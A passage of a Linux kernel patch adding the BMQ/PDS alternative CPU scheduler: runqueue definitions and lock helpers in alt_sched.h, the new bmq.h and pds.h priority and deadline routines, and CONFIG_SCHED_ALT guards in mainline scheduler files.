++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For general cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within an RCU lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++
++	/* Scratch cpumask to be temporarily used under rq_lock */
++	cpumask_var_t		scratch_mask;
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
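++
++/*
++ * The masks are ordered from narrowest to widest (the CPU itself,
++ * then SMT siblings, coregroup, core, others), so the first hit is
++ * the topologically closest allowed CPU.
++ */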
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking: as in VRQ, a call to
++	 * sched_info_xxxx() may not hold rq->lock, hence skip
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking: as in VRQ, a call to
++	 * sched_info_xxxx() may not hold rq->lock, hence skip
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler APIs used by other kernel code.
++ * They take a dummy rq_flags argument.
++ * TODO: BMQ needs to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
++ * subtracted from it and never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
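++/*
++ * The __u64_stats_fetch_begin()/_retry() pair makes this 64-bit
++ * read tear-free on 32-bit kernels: a concurrent writer bumps the
++ * sequence count and the loop simply re-reads total.
++ */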
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching is
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
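++
++/*
++ * Boosting decrements boost_prio (lower is better): SCHED_NORMAL
++ * tasks can go down to -MAX_PRIORITY_ADJ, while SCHED_BATCH and
++ * SCHED_IDLE are clamped at 0 so they never boost past their base
++ * priority.
++ */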
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
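++
++/*
++ * Rough worked example, assuming MAX_RT_PRIO == 100: an RT task
++ * with prio 10 keeps index 10, while a SCHED_NORMAL task with
++ * prio 120 and boost_prio 0 maps to 100 / 2 + (120 + 0) / 2 == 110.
++ */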
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
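++
++/*
++ * For a fixed rq->time_edge the two mappings above are inverses:
++ * sched_idx2prio(sched_prio2idx(prio, rq), rq) == prio, since the
++ * rotation by time_edge is undone modulo NORMAL_PRIO_NUM.
++ */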
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
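++
++/*
++ * Sketch of the rotation above: the normal-priority lists form a
++ * ring indexed by deadline modulo NORMAL_PRIO_NUM.  When time_edge
++ * advances by delta ticks, the delta oldest slots have expired;
++ * their tasks are spliced onto the slot that now means "deadline
++ * reached" and the bitmap word is shifted to match.
++ */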
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
